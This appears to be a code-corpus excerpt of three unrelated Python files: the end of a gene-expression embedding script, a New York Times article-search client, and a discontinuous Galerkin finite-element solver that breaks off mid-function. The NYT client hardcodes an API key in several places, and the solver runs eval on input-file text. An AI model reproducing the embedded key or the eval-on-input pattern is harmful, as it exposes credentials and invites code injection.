print("Embedding method: {}".format(FLAGS.embedding_method))
print("--------------------------------------------")
print("--------------------------------------------")

# Prepare Data
X, A, Y = load_training_data(dataset=FLAGS.dataset)
Y_train, Y_val, Y_test, train_idx, val_idx, test_idx, train_mask = get_splits_for_learning(Y, dataset=FLAGS.dataset)

# Normalize gene expression
X = normalize(X, norm='l1')  # for positive non-zero entries, it's equivalent to: X /= X.sum(1).reshape(-1, 1)

# Save the node embeddings
np.savetxt("{}/data/output/{}/embedding/{}/embeddings.txt".format(project_path, FLAGS.dataset, FLAGS.embedding_method), X, delimiter="\t")
print("Embeddings saved in /data/output/{}/embedding/{}/embeddings.txt".format(FLAGS.dataset, FLAGS.embedding_method)) | 38.433333 | 139 | 0.685603 | 299 | 2,306 | 5.133779 | 0.408027 | 0.070358 | 0.065147 | 0.057329 | 0.255375 | 0.189577 | 0.120521 | 0.120521 | 0.088599 | 0.088599 | 0 | 0.004885 | 0.112316 | 2,306 | 60 | 140 | 38.433333 | 0.744993 | 0.083695 | 0 | 0.097561 | 0 | 0 | 0.272594 | 0.169516 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.390244 | 0 | 0.390244 | 0.219512 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
49755e37e2029b777679857be7a2f1b70a206d0d | 2,700 | py | Python | omnithinker/api/nytimes.py | stuycs-softdev-fall-2013/proj2-pd6-04-omnithinker | 53bf397ce2f67e7d5c5689486ab75475e99b0eba | [
"MIT",
"BSD-3-Clause"
] | 1 | 2022-01-18T02:03:15.000Z | 2022-01-18T02:03:15.000Z | omnithinker/api/nytimes.py | stuycs-softdev-fall-2013/proj2-pd6-04-omnithinker | 53bf397ce2f67e7d5c5689486ab75475e99b0eba | [
"MIT",
"BSD-3-Clause"
] | null | null | null | omnithinker/api/nytimes.py | stuycs-softdev-fall-2013/proj2-pd6-04-omnithinker | 53bf397ce2f67e7d5c5689486ab75475e99b0eba | [
"MIT",
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
import json
from urllib import urlopen

# http://api.nytimes.com/svc/search/v2/articlesearch.json?fq=Obama&FACET_FIELD=day_of_week&BEGIN_DATE=19000101
# &API-KEY=5772CD9A42F195C96DA0E930A7182688:14:68439177
# The original link is above. What happens is because we don't specify an end date, the panda article, which was
# coincidentally published today, becomes the first article that we see and gives us keywords like zoo.
# If we add an end date before then, then we can filter it out.


def ReturnRelatedTopics(Topic):
    NYT_API_URL = 'http://api.nytimes.com/svc/search/v2/articlesearch'
    API_KEY = "5772CD9A42F195C96DA0E930A7182688:14:68439177"
    FORMAT = "json"
    FQ = str(Topic)
    FACET_FIELD = "day_of_week"
    BEGIN_DATE = str(19000101)
    END_DATE = str(20131208)
    url = ("%s.%s?fq=%s&FACET_FIELD=%s&BEGIN_DATE=%s&END_DATE=%s&API-KEY=%s") % (NYT_API_URL, FORMAT, FQ, FACET_FIELD, BEGIN_DATE, END_DATE, API_KEY)
    response = urlopen(url)
    Json_Data = json.loads(response.read())
    RELTOPICS = list()
    for y in Json_Data["response"]["docs"]:
        for x in y:
            if x == "keywords":
                for a in y[x]:
                    RELTOPICS.append(a["value"])
    RELTOPICS.pop(0)
    RELTOPICS.pop(0)
    RELTOPICS.pop(0)
    return RELTOPICS


class Nytimes():

    def __init__(self, Topic):
        NYT_API_URL = 'http://api.nytimes.com/svc/search/v2/articlesearch'
        API_KEY = "5772CD9A42F195C96DA0E930A7182688:14:68439177"
        FORMAT = "json"
        FQ = str(Topic)
        FACET_FIELD = "day_of_week"
        BEGIN_DATE = str(19000101)
        END_DATE = str(20131208)
        url = ("%s.%s?fq=%s&FACET_FIELD=%s&BEGIN_DATE=%s&END_DATE=%s&API-KEY=%s") % (NYT_API_URL, FORMAT, FQ, FACET_FIELD, BEGIN_DATE, END_DATE, API_KEY)
        response = urlopen(url)
        self.Json_Data = json.loads(response.read())

        URL = list()
        TITLE = list()
        SNIPPET = list()
        Counter = 0
        for x in self.Json_Data["response"]["docs"]:
            # print x
            URL.append(x["web_url"])
            TITLE.append(x["headline"]["main"])
            SNIPPET.append(x["snippet"])
        # print(URL)
        # print(TITLE)
        # print(SNIPPET)
        self.Data = zip(URL, TITLE, SNIPPET)
        self.counter = 0
        # print(Data)

    def getArticle(self):
        try:
            self.counter += 1
            return self.Data[self.counter - 1]
        except:
            return list()

# End of class


if __name__ == '__main__':
    # FindArticles("Obama")
    print ReturnRelatedTopics("airplane")
4978db654876ffc9e3f0801f73bab29baba94038 | 29,541 | py | Python | isitek.py | will-bainbridge/ISITEK | 53e90e0511bbd7cd08614b943c1286c56adbee5e | [
"MIT"
] | 3 | 2018-06-26T15:04:46.000Z | 2019-09-14T09:23:44.000Z | isitek.py | will-bainbridge/ISITEK | 53e90e0511bbd7cd08614b943c1286c56adbee5e | [
"MIT"
] | null | null | null | isitek.py | will-bainbridge/ISITEK | 53e90e0511bbd7cd08614b943c1286c56adbee5e | [
"MIT"
] | 3 | 2016-11-28T12:19:37.000Z | 2020-02-04T00:18:56.000Z | #!/usr/bin/python
################################################################################
import numpy
import os
import cPickle as pickle
import scipy.misc
import scipy.sparse
import scipy.sparse.linalg
import scipy.special
import sys
import time
class Struct:
    def __init__(self, **keywords):
        self.__dict__.update(keywords)

class Timer(object):
    def __init__(self, name=None, multiline=False):
        self.name = name
        self.multiline = multiline

    def __enter__(self):
        self.start = time.time()
        if self.name:
            print '%s ...' % self.name ,
            if self.multiline:
                print
        sys.stdout.flush()

    def __exit__(self, type, value, traceback):
        if self.multiline:
            print ' ...' ,
        print 'done in %.3f s' % (time.time() - self.start)
################################################################################
def nodegrid(a,b):
    return [ x.T for x in numpy.meshgrid(a,b) ]

def dot_sequence(*args):
    if len(args) == 1: return args[0]
    else: return numpy.dot( args[0] , dot_sequence(*args[1:]) )

def string_multiple_replace(string,dict):
    for s,r in dict.iteritems():
        string = string.replace(s,r)
    return string
################################################################################
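
# quick illustrative checks of the helpers above (added for clarity; not part
# of the solver):
#
# dot_sequence(A, B, C) == numpy.dot(A, numpy.dot(B, C)) for conforming arrays
# string_multiple_replace('sin(pi)', {'pi': 'numpy.pi', 'sin(': 'numpy.sin('})
#     -> 'numpy.sin(numpy.pi)'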
def read_data_file(data_filename):
    file = open(data_filename,'rb')
    data = pickle.load(file)
    file.close()

    node = data['node']
    face = data['face']
    element = data['element']
    boundary = data['boundary']
    u = data['u']
    order = data['order']

    return node,face,element,boundary,u,order

#------------------------------------------------------------------------------#

def read_input_file(input_filename):
    geometry_filename = []
    order = []
    boundary = []
    initial = []
    term = []
    wind = []
    iterations = []
    mesh_size = []
    constant = []

    file = open(input_filename,'r')
    for line in file.readlines():
        lineparts = line.split()
        if len(lineparts) >= 2 and lineparts[0] == 'geometry_filename':
            geometry_filename = lineparts[1]
        if len(lineparts) >= 2 and lineparts[0] == 'order':
            order = numpy.array([ int(x) for x in lineparts[1:] ])
        if len(lineparts) >= 4 and lineparts[0] == 'boundary':
            boundary.append(Struct(
                    face = sum([ list(z) if len(z) == 1 else range(*z) for z in [ tuple( int(y) for y in x.split(':') ) for x in lineparts[1].split(',') ] ],[]) ,
                    variable = int(lineparts[2]) ,
                    condition = tuple(sum([ x == y for x in lineparts[3] ]) for y in 'nt') ,
                    value = float(lineparts[4]) if len(lineparts) >= 5 else 0.0 ))
        if len(lineparts) >= 2 and lineparts[0] == 'initial':
            initial = lineparts[1:]
        if len(lineparts) >= 2 and lineparts[0] == 'constant':
            constant = lineparts[1]
        if len(lineparts) >= 6 and lineparts[0] == 'term':
            term.append(Struct(
                    equation = int(lineparts[1]) ,
                    variable = [ int(x) for x in lineparts[2].split(',') ] ,
                    direction = lineparts[3] ,
                    differential = [ tuple( sum([ x == y for x in z ]) for y in 'xy' ) for z in lineparts[4].split(',') ] ,
                    power = [ int(x) for x in lineparts[5].split(',') ] ,
                    constant = lineparts[6] ,
                    method = lineparts[7] ))
        if len(lineparts) >= 2 and lineparts[0] == 'wind':
            wind = eval( 'lambda n,u,v:' + lineparts[1] , {'numpy':numpy} , {} )
        if len(lineparts) >= 2 and lineparts[0] == 'iterations':
            iterations = int(lineparts[1])
        if len(lineparts) >= 2 and lineparts[0] == 'mesh_size':
            mesh_size = int(lineparts[1])
    file.close()

    if len(constant):
        constant = dict([ (y[0],float(y[1])) for y in [ x.split('=') for x in constant.split(';') ] ])
    else:
        constant = {}

    if len(term):
        for i in range(0,len(term)):
            term[i].constant = eval(term[i].constant,{},constant)

    if len(initial):
        replace = {'pi':'numpy.pi','cos(':'numpy.cos(','sin(':'numpy.sin('}
        for i in range(0,len(initial)):
            initial[i] = eval( 'lambda x,y: numpy.ones(x.shape)*(' + string_multiple_replace(initial[i],replace) + ')' , {'numpy':numpy} , constant )

    return geometry_filename,order,boundary,initial,term,wind,iterations,mesh_size
#------------------------------------------------------------------------------#
def element_sequential_indices(e,element,face):
    n = len(element[e].face)

    polyline = numpy.array([ list(face[f].node) for f in element[e].face ])
    polynode = numpy.unique(polyline)

    ones = numpy.ones((n,1))
    connect = 1*(ones*polyline[:,0] == (ones*polynode).T) + 2*(ones*polyline[:,1] == (ones*polynode).T)

    side = [0]*n
    vertex = [0]*n
    for i in range(1,n):
        temp = connect[connect[:,side[i-1]] == (int(not vertex[i-1])+1),:].flatten() * (numpy.arange(0,n) != side[i-1])
        side[i] = temp.nonzero()[0][0]
        vertex[i] = temp[side[i]]-1

    return [side,vertex]
#------------------------------------------------------------------------------#
def read_geometry(geometry_filename):

    # read the geometry file
    file = open(geometry_filename,'r')
    data = file.readlines()
    file.close()

    # generate the mesh structures
    i = 0
    while i < len(data):
        if data[i].strip().split()[0] == 'NODES':
            nn = int(data[i].strip().split()[1])
            node = [ Struct(x=(0.0,0.0)) for _ in range(0,nn) ]
            for n in range(0,nn):
                node[n].x = tuple( [ float(x) for x in data[i+1+n].strip().split() ] )
            i += nn
        elif data[i].strip().split()[0] == 'FACES':
            nf = int(data[i].strip().split()[1])
            face = [ Struct(node=(0,0),border=[],size=1.0,normal=(0.0,0.0),centre=(0.0,0.0),boundary=[],Q=[]) for temp in range(0,nf) ]
            for f in range(0,nf):
                face[f].node = tuple( [ int(x) for x in data[i+1+f].strip().split() ] )
            i += nf
        elif data[i].strip().split()[0] == 'CELLS' or data[i].strip().split()[0] == 'ELEMENTS':
            ne = int(data[i].strip().split()[1])
            element = [ Struct(face=[],orientation=[],size=1.0,area=0.0,centre=(0.0,0.0),unknown=[],V=[],P=[],Q=[],W=[],X=[]) for temp in range(0,ne) ]
            for e in range(0,ne):
                element[e].face = [ int(x) for x in data[i+1+e].strip().split() ]
            i += ne
        else:
            i += 1

    # generate borders
    for e in range(0,ne):
        for f in element[e].face:
            face[f].border.append(e)

    # additional element geometry
    for e in range(0,ne):
        s,t = element_sequential_indices(e,element,face)
        index = [ face[element[e].face[i]].node[j] for i,j in zip(s,t) ]
        cross = [ node[index[i-1]].x[0]*node[index[i]].x[1]-node[index[i]].x[0]*node[index[i-1]].x[1] for i in range(0,len(element[e].face)) ]
        element[e].area = 0.5*sum(cross)
        element[e].centre = tuple([ sum([ (node[index[i-1]].x[j]+node[index[i]].x[j])*cross[i] for i in range(0,len(element[e].face)) ])/(6*element[e].area) for j in range(0,2) ])
        element[e].orientation = [ 2*t[i]-1 for i in s ]
        if element[e].area < 0.0:
            element[e].area = -element[e].area
            element[e].orientation = [ -x for x in element[e].orientation ]
        element[e].size = numpy.sqrt(element[e].area)

    # additional face geometry
    for f in range(0,nf):
        face[f].normal = ( -node[face[f].node[1]].x[1]+node[face[f].node[0]].x[1] , +node[face[f].node[1]].x[0]-node[face[f].node[0]].x[0] )
        face[f].size = 0.5*numpy.sqrt(numpy.dot(face[f].normal,face[f].normal))
        face[f].centre = tuple([ 0.5*(node[face[f].node[1]].x[i]+node[face[f].node[0]].x[i]) for i in range(0,2) ])

    # return
    return node,face,element
#------------------------------------------------------------------------------#
def assign_boundaries():
nv = len(order)
for f in range(0,len(face)):
face[f].boundary = [ [] for v in range(0,nv) ]
for b in range(0,len(boundary)):
for f in boundary[b].face:
face[f].boundary[boundary[b].variable].append(b)
#------------------------------------------------------------------------------#
def generate_unknowns():
nv = len(order)
np = order*(order+1)/2
nu = 0
# number by element then variable
# > gives a more diagonally dominant system
for e in range(0,len(element)):
element[e].unknown = [ [] for v in range(0,nv) ]
for v in range(0,nv):
element[e].unknown[v] = range(nu,nu+np[v])
nu += np[v]
## number by variable then element
## > gives a system with visible blocks corresponding to equations
#for e in range(0,len(element)): element[e].unknown = [ [] for v in range(0,nv) ]
#for v in range(0,nv):
# for e in range(0,len(element)):
# element[e].unknown[v] = range(nu,nu+np[v])
# nu += np[v]
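    # e.g. with order = [2,1] (so np = [3,1]) and two elements, element-first
    # numbering gives element[0].unknown = [[0,1,2],[3]], element[1].unknown =
    # [[4,5,6],[7]]; the variable-first variant gives [[0,1,2],[6]], [[3,4,5],[7]]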
return numpy.zeros(nu)
#------------------------------------------------------------------------------#
def generate_constants(order):
max_order = max(order)
ng = 2*max_order-1
gauss_locations,gauss_weights = [ x.real for x in scipy.special.orthogonal.p_roots(ng) ]
#nh = 7
#hammer_locations = numpy.array([
# [0.101286507323456,0.101286507323456],[0.797426958353087,0.101286507323456],[0.101286507323456,0.797426958353087],
# [0.470142064105115,0.470142064105115],[0.059715871789770,0.470142064105115],[0.470142064105115,0.059715871789770],
# [0.333333333333333,0.333333333333333]])
#hammer_weights = 0.5 * numpy.array([
# 0.125939180544827,0.125939180544827,0.125939180544827,0.132394152788506,0.132394152788506,0.132394152788506,
# 0.225000000000000])
#nh = 9
#hammer_locations = numpy.array([
# [0.437525248383384,0.437525248383384],[0.124949503233232,0.437525248383384],[0.437525248383384,0.124949503233232],
# [0.165409927389841,0.037477420750088],[0.037477420750088,0.165409927389841],[0.797112651860071,0.165409927389841],
# [0.165409927389841,0.797112651860071],[0.037477420750088,0.797112651860071],[0.797112651860071,0.037477420750088]])
#hammer_weights = 0.5 * numpy.array([
# 0.205950504760887,0.205950504760887,0.205950504760887,0.063691414286223,0.063691414286223,0.063691414286223,
# 0.063691414286223,0.063691414286223,0.063691414286223])
nh = 12
hammer_locations = numpy.array([
[0.063089014491502,0.063089014491502],[0.873821971016996,0.063089014491502],[0.063089014491502,0.873821971016996],
[0.249286745170910,0.249286745170910],[0.501426509658179,0.249286745170910],[0.249286745170910,0.501426509658179],
[0.310352451033785,0.053145049844816],[0.053145049844816,0.310352451033785],[0.636502499121399,0.310352451033785],
[0.310352451033785,0.636502499121399],[0.053145049844816,0.636502499121399],[0.636502499121399,0.053145049844816]])
hammer_weights = 0.5 * numpy.array([
0.050844906370207,0.050844906370207,0.050844906370207,0.116786275726379,0.116786275726379,0.116786275726379,
0.082851075618374,0.082851075618374,0.082851075618374,0.082851075618374,0.082851075618374,0.082851075618374])
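    # the 12-point Hammer rule above integrates polynomials up to degree 6 exactly
    # on the reference triangle; the commented 7- and 9-point tables are lower-order
    # alternatives kept for reference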
taylor_coefficients = numpy.array([])
taylor_powers = numpy.zeros((0,2),dtype=int)
for i in range(0,2*max_order):
taylor_coefficients = numpy.append(taylor_coefficients,scipy.misc.comb(i*numpy.ones(i+1),numpy.arange(0,i+1))/scipy.misc.factorial(i))
taylor_powers = numpy.append(taylor_powers,numpy.array([range(i,-1,-1),range(0,i+1)],dtype=int).T,axis=0)
powers_taylor = numpy.zeros((2*max_order,2*max_order),dtype=int)
for i in range(0,taylor_powers.shape[0]): powers_taylor[taylor_powers[i][0]][taylor_powers[i][1]] = i
factorial = scipy.misc.factorial(numpy.arange(0,2*max_order))
return gauss_locations,gauss_weights,hammer_locations,hammer_weights,taylor_coefficients,taylor_powers,powers_taylor,factorial
#------------------------------------------------------------------------------#
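# evaluates basis function n of the element at points (x,y): a Taylor monomial in
# (x,y) - centre scaled by the element size, differentiated 'differential' times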
def basis(x,y,element,n,differential):
if taylor_powers[n,0] < differential[0] or taylor_powers[n,1] < differential[1]:
return numpy.zeros(x.shape)
p = taylor_powers[n]
q = taylor_powers[n]-differential
constant = taylor_coefficients[n] / numpy.power( element.size , sum(p) )
constant = constant * factorial[p[0]] * factorial[p[1]] / ( factorial[q[0]] * factorial[q[1]] )
return constant * numpy.power(x-element.centre[0],q[0]) * numpy.power(y-element.centre[1],q[1])
#------------------------------------------------------------------------------#
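# builds the matrix that re-expresses Taylor-basis derivatives under the 2x2
# linear coordinate transform A (used later to map face-frame derivatives to x-y)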
def derivative_transform_matrix(A,order):
n = order*(order+1)/2
D = numpy.zeros((n,n))
D[0,0] = 1.0
for i in range(0,order-1):
old = numpy.nonzero(numpy.sum(taylor_powers,axis=1) == i)[0]
temp = numpy.append( taylor_powers[old,:] + [1,0] , taylor_powers[old[taylor_powers[old,0] == 0],:] + [0,1] , axis=0 )
new = powers_taylor[temp[:,0],temp[:,1]]
index = nodegrid(old,old)
D[nodegrid(new,new)] = numpy.append(
A[0,0] * numpy.append( D[index] , numpy.zeros((i+1,1)) , axis=1 ) +
A[0,1] * numpy.append( numpy.zeros((i+1,1)) , D[index] , axis=1 ) ,
A[1,0] * numpy.append( D[old[-1],[old]] , [[0]] , axis=1 ) +
A[1,1] * numpy.append( [[0]] , D[old[-1],[old]] , axis=1 ) , axis=0 )
return D
#------------------------------------------------------------------------------#
def calculate_element_matrices():
nf = len(face)
ne = len(element)
nv = len(order)
max_order = max(order)
np = numpy.array([ len(x) for x in element[0].unknown ])
max_np = max(np)
ng = len(gauss_weights)
nh = len(hammer_weights)
# initialise
if do.pre:
for e in range(0,ne):
element[e].V = numpy.zeros((max_np,max_np))
element[e].P = numpy.zeros((max_np,(len(element[e].face)-2)*nh,max_np))
element[e].Q = [ numpy.zeros((ng,max_np)) for i in range(0,len(element[e].face)) ]
element[e].W = numpy.zeros((len(element[e].face)-2)*nh)
element[e].X = numpy.zeros(((len(element[e].face)-2)*nh,2))
for f in range(0,nf):
face[f].Q = [ [] for v in range(0,nv) ]
    # element Vandermonde matrices
if do.pre:
for e in range(0,ne):
for i in range(0,max_np):
for j in range(0,max_np):
element[e].V[i,j] = basis(numpy.array(element[e].centre[0]),numpy.array(element[e].centre[1]),element[e],i,taylor_powers[j])
# triangulation and element area quadrature
for e in range(0,ne):
# triangulate
nt = len(element[e].face)-2
v = numpy.zeros((nt,3),dtype=int)
v[:,0] = face[element[e].face[0]].node[0]
j = 0
for i in range(0,len(element[e].face)):
f = element[e].face[i]
o = int(element[e].orientation[i] < 0)
v[j][1:] = numpy.array(face[f].node)[[1-o,o]]
j += not any(v[j][1:] == v[j][0])
if j >= nt: break
        # integration locations within, and areas of, the triangles
element[e].X = numpy.zeros(((len(element[e].face)-2)*nh,2))
area = numpy.zeros(nt)
for i in range(0,nt):
d = numpy.array([ [ node[v[i][j]].x[k] - node[v[i][0]].x[k] for k in range(0,2) ] for j in range(1,3) ])
element[e].X[i*nh:(i+1)*nh] = ( numpy.ones((nh,1))*node[v[i][0]].x +
hammer_locations[:,0][numpy.newaxis].T*d[0] +
hammer_locations[:,1][numpy.newaxis].T*d[1] )
area[i] = numpy.cross(d[0,:],d[1,:])
# integration weights
element[e].W = (numpy.array([area]).T*hammer_weights).flatten()
# element FEM numerics matrices
if do.pre:
for e in range(0,ne):
# basis function values at the integration points
for i in range(0,max_np):
for j in range(0,max_np):
element[e].P[i][:,j] = basis(element[e].X[:,0],element[e].X[:,1],element[e],j,taylor_powers[i])
# element DG-FEM numerics matrices
if do.pre:
for e in range(0,ne):
for i in range(0,len(element[e].face)):
f = element[e].face[i]
# integration locations along the face
temp = gauss_locations[numpy.newaxis].T
x = 0.5*(1.0-temp)*node[face[f].node[0]].x + 0.5*(1.0+temp)*node[face[f].node[1]].x
# basis function values at the integration points
for j in range(0,max_np):
element[e].Q[i][:,j] = basis(x[:,0],x[:,1],element[e],j,[0,0])
# face IDG-FEM numerics matrices
for f in range(0,nf):
# adjacent element and boundaries
a = numpy.array(face[f].border)
na = len(a)
b = numpy.array(face[f].boundary,dtype=object)
nb = [ len(i) for i in b ]
if do.pre or (do.re and any(b)):
# rotation to face coordinates
R = numpy.array([[-face[f].normal[0],-face[f].normal[1]],[face[f].normal[1],-face[f].normal[0]]])
R /= numpy.sqrt(numpy.dot(face[f].normal,face[f].normal))
# face locations
x = 0.5*(1.0-gauss_locations[numpy.newaxis].T)*node[face[f].node[0]].x + 0.5*(1.0+gauss_locations[numpy.newaxis].T)*node[face[f].node[1]].x
y = face[f].centre + numpy.dot( x - face[f].centre , R.T )
w = gauss_weights
# adjacent integration locations
xa = [ element[a[i]].X for i in range(0,na) ]
ya = [ face[f].centre + numpy.dot( xa[i] - face[f].centre , R.T ) for i in range(0,na) ]
wa = numpy.append(element[a[0]].W,element[a[1]].W) if na == 2 else element[a[0]].W
for v in range(0,nv):
# face basis indices
temp = nodegrid(range(0,2*order[v]),range(0,2*order[v])) # NOTE # not sufficient for boundary faces with 2 bordering elements
face_taylor = powers_taylor[ numpy.logical_and( temp[0] + na*temp[1] < na*order[v] + nb[v] , temp[1] < order[v] ) ]
# number of interpolation unknowns
ni = len(face_taylor)
# matrices
P = numpy.zeros((na*nh,na*np[v]))
for j in range(0,np[v]):
for k in range(0,na):
P[k*nh:(1+k)*nh,j+k*np[v]] = basis(xa[k][:,0],xa[k][:,1],element[a[k]],j,[0,0])
Q = numpy.zeros((na*nh,ni))
for j in range(0,ni):
for k in range(0,na):
Q[k*nh:(k+1)*nh,j] = basis(ya[k][:,0],ya[k][:,1],face[f],face_taylor[j],[0,0])
A = dot_sequence( P.T , numpy.diag(wa) , Q )
B = dot_sequence( P.T , numpy.diag(wa) , P )
# boundary parts
if nb[v]:
dA = numpy.zeros((nb[v]*order[v],ni))
for i in range(0,nb[v]):
for j in range(0,ni):
for k in range(0,order[v]):
dA[k+i*order[v],j] = basis(
numpy.array(face[f].centre[0]),
numpy.array(face[f].centre[1]),
face[f],face_taylor[j],
[ sum(temp) for temp in zip([0,k],boundary[b[v][i]].condition) ])
dB = numpy.zeros((nb[v]*order[v],nb[v]))
for i in range(0,nb[v]): dB[i*order[v],i] = 1.0
A = numpy.append( A , dA , axis=0 )
B = numpy.append( numpy.append( B , numpy.zeros((B.shape[0],nb[v])) , axis=1 ) ,
numpy.append( numpy.zeros((nb[v]*order[v],B.shape[1])) , dB , axis=1 ) ,
axis=0 )
# solve interpolation problem
D = numpy.linalg.solve(A,B)
# interpolated values
F = numpy.zeros((ng,ni))
face[f].Q[v] = numpy.zeros((np[v],ng,D.shape[1]))
for j in range(0,np[v]):
for k in range(0,ni):
F[:,k] = basis(y[:,0],y[:,1],face[f],face_taylor[k],taylor_powers[j])
face[f].Q[v][j] = numpy.dot( F , D )
# transform differentials to x and y
T = derivative_transform_matrix(numpy.linalg.inv(R),order[v])
for j in range(0,ng): face[f].Q[v][:,j] = numpy.dot( T , face[f].Q[v][:,j] )
#------------------------------------------------------------------------------#
def initialise_unknowns():
ne = len(element)
np = [ len(x) for x in element[0].unknown ]
nv = len(order)
max_order = max(order)
max_order_sq = max_order*max_order
max_np = max(np)
for e in range(0,ne):
x = element[e].centre
delta = numpy.linspace(-0.1*element[e].size/2,0.1*element[e].size/2,max_order)
dx = [ temp.flatten() for temp in nodegrid(delta,delta) ]
p = [ taylor_powers[0:max_np,i] for i in range(0,2) ]
M = ((numpy.ones((max_np,1)) * dx[0]).T ** (numpy.ones((max_order_sq,1)) * p[0]) *
(numpy.ones((max_np,1)) * dx[1]).T ** (numpy.ones((max_order_sq,1)) * p[1]) *
(numpy.ones((max_order_sq,1)) * (scipy.misc.comb(p[0]+p[1],p[0])/scipy.misc.factorial(p[0]+p[1]))))
inv_M = numpy.linalg.pinv(M)
inv_V = numpy.linalg.inv(element[e].V)
for v in range(0,nv):
u[element[e].unknown[v]] = dot_sequence( inv_V , inv_M , initial[v](dx[0]+x[0],dx[1]+x[1]) )[0:np[v]]
#------------------------------------------------------------------------------#
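# assembles the residual vector F and the sparse CSR Jacobian J of the discrete
# system at the current unknowns u, looping over elements, terms and faces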
def generate_system():
ne = len(element)
ng = len(gauss_weights)
nh = len(hammer_weights)
np = [ len(x) for x in element[0].unknown ]
nt = len(term)
nv = len(order)
max_np = max(np)
sum_np = sum(np)
sum_np_sq = sum_np*sum_np
# local dense jacobian
L = Struct(i=[],x=[])
# csr system jacobian
J = Struct(p=[],i=[],x=[])
J.p = numpy.zeros(u.shape[0]+1,dtype=int)
for e in range(0,ne):
temp = sum_np
for f in element[e].face: temp += sum_np*(len(face[f].border) == 2)
J.p[numpy.array(sum(element[e].unknown,[]))+1] = temp
J.p = numpy.cumsum(J.p)
J.i = numpy.zeros(J.p[-1],dtype=int)
J.x = numpy.zeros(J.p[-1])
# function vector
F = numpy.zeros(u.shape)
for e in range(0,ne):
# number of faces
nf = len(element[e].face)
# adjacent elements
adj = - numpy.ones(nf,dtype=int)
for i in range(0,nf):
temp = numpy.array(face[element[e].face[i]].border)
temp = temp[temp != e]
if len(temp): adj[i] = temp[0]
n_adj = sum(adj >= 0)
i_adj = numpy.arange(0,nf)[adj >= 0]
# local matrices to add to the system
L.i = numpy.zeros((sum_np,(1+n_adj)*sum_np),dtype=int)
L.i[:,0:sum_np] = numpy.tile( sum(element[e].unknown,[]) , (sum_np,1) )
for i in range(0,n_adj): L.i[:,(i+1)*sum_np:(i+2)*sum_np] = numpy.tile( sum(element[adj[i_adj[i]]].unknown,[]) , (sum_np,1) )
L.x = numpy.zeros(L.i.shape)
# indices into the local matrices
index_e = [ numpy.arange(sum(np[:v]),sum(np[:v+1]))[numpy.newaxis] for v in range(0,nv) ]
index_a = [ [] for i in range(0,nf) ]
for i in range(0,n_adj):
index_a[i_adj[i]] = [ numpy.array([
range(sum(np[:v]),sum(np[:v+1])) +
range((i+1)*sum_np+sum(np[:v]),(i+1)*sum_np+sum(np[:v+1])) ])
for v in range(0,nv) ]
# loop over terms
for t in range(0,nt):
# numbers of variables in the term product sequence
ns = len(term[t].variable)
# direction index
direction = powers_taylor[int(term[t].direction == 'x'),int(term[t].direction == 'y')]
# powers
P = numpy.array(term[t].power)[numpy.newaxis].T
# equation matrix
A = - term[t].constant * dot_sequence( element[e].P[direction][:,0:np[term[t].equation]].T , numpy.diag(element[e].W) )
# calculate the coefficients and values
B = [ [] for s in range(0,ns) ]
X = numpy.zeros((ns,nh))
for s,v in zip(range(0,ns),term[t].variable):
B[s] = element[e].P[powers_taylor[term[t].differential[s]]][:,0:np[v]]
X[s,:] = numpy.dot( B[s] , u[element[e].unknown[v]] )
# add to the local jacobian
Y = X ** P
for s,v in zip(range(0,ns),term[t].variable):
temp = numpy.copy(Y)
temp[s,:] = P[s] * X[s,:] ** (P[s]-1)
L.x[index_e[term[t].equation].T,index_e[v]] += dot_sequence( A , numpy.diag(numpy.prod(temp,axis=0)) , B[s] )
# add to the function vector
F[element[e].unknown[term[t].equation]] += numpy.dot( A , numpy.prod(Y,axis=0) )
# continue if not a flux term
if term[t].direction != 'x' and term[t].direction != 'y': continue
# face components
for i in range(0,nf):
f = element[e].face[i]
a = adj[i]
b = numpy.array(face[f].boundary,dtype=object)
# face normal
normal = element[e].orientation[i] * numpy.array(face[f].normal)
# corresponding face index
if a >= 0: j = numpy.arange(0,len(element[a].face))[numpy.array(element[a].face) == f]
# wind
if a >= 0 and ('u' in term[t].method):
ui = [ dot_sequence( gauss_weights , element[e].Q[i][:,0:np[v]] , u[element[e].unknown[v]] ) for v in range(0,nv) ]
uo = [ dot_sequence( gauss_weights , element[a].Q[j][:,0:np[v]] , u[element[a].unknown[v]] ) for v in range(0,nv) ]
w = wind( normal , ui , uo )
else:
w = True
# equation matrix
A = normal[term[t].direction == 'y'] * term[t].constant * dot_sequence(
element[e].Q[i][:,0:np[term[t].equation]].T , numpy.diag(0.5*gauss_weights) )
# calculate the coefficients and values
B = [ [] for s in range(0,ns) ]
X = numpy.zeros((ns,ng))
for s,v in zip(range(0,ns),term[t].variable):
# where there is an adjacent element
if a >= 0:
# interpolated flux
if term[t].method[s] == 'i' or len(b[v]):
if face[f].border[0] == e: temp = numpy.array(range(0,2*np[v]))
else: temp = numpy.array(range(np[v],2*np[v])+range(0,np[v]))
B[s] = face[f].Q[v][powers_taylor[term[t].differential[s]]][:,temp]
# averaged flux
elif term[t].method[s] == 'a':
B[s] = 0.5*numpy.append(element[e].Q[i][:,0:np[v]],element[a].Q[j][:,0:np[v]],axis=1)
# upwind flux
elif term[t].method[s] == 'u':
B[s] = numpy.zeros((ng,2*np[v]))
if w: B[s][:,0:np[v]] += element[e].Q[i][:,0:np[v]]
else: B[s][:,np[v]:2*np[v]] += element[a].Q[j][:,0:np[v]]
# values
X[s,:] = numpy.dot( B[s] , numpy.append(u[element[e].unknown[v]],u[element[a].unknown[v]]) )
# interpolated flux where there is no adjacent element
else:
B[s] = face[f].Q[v][powers_taylor[term[t].differential[s]]][:,0:np[v]]
X[s,:] = numpy.dot( B[s] , u[element[e].unknown[v]] )
# interpolated flux at boundaries
if len(b[v]):
for k in range(0,len(b[v])):
X[s,:] += boundary[b[v][k]].value * face[f].Q[v][powers_taylor[term[t].differential[s]]][:,(1+(a>=0))*np[v]+k]
# add to the local jacobian
Y = X ** P
for s,v in zip(range(0,ns),term[t].variable):
temp = numpy.copy(Y)
temp[s,:] = P[s] * X[s,:] ** (P[s]-1)
L.x[index_e[term[t].equation].T,index_a[i][v] if a >= 0 else index_e[v]] += dot_sequence(
A , numpy.diag(numpy.prod(temp,axis=0)) , B[s] )
# add to the function vector
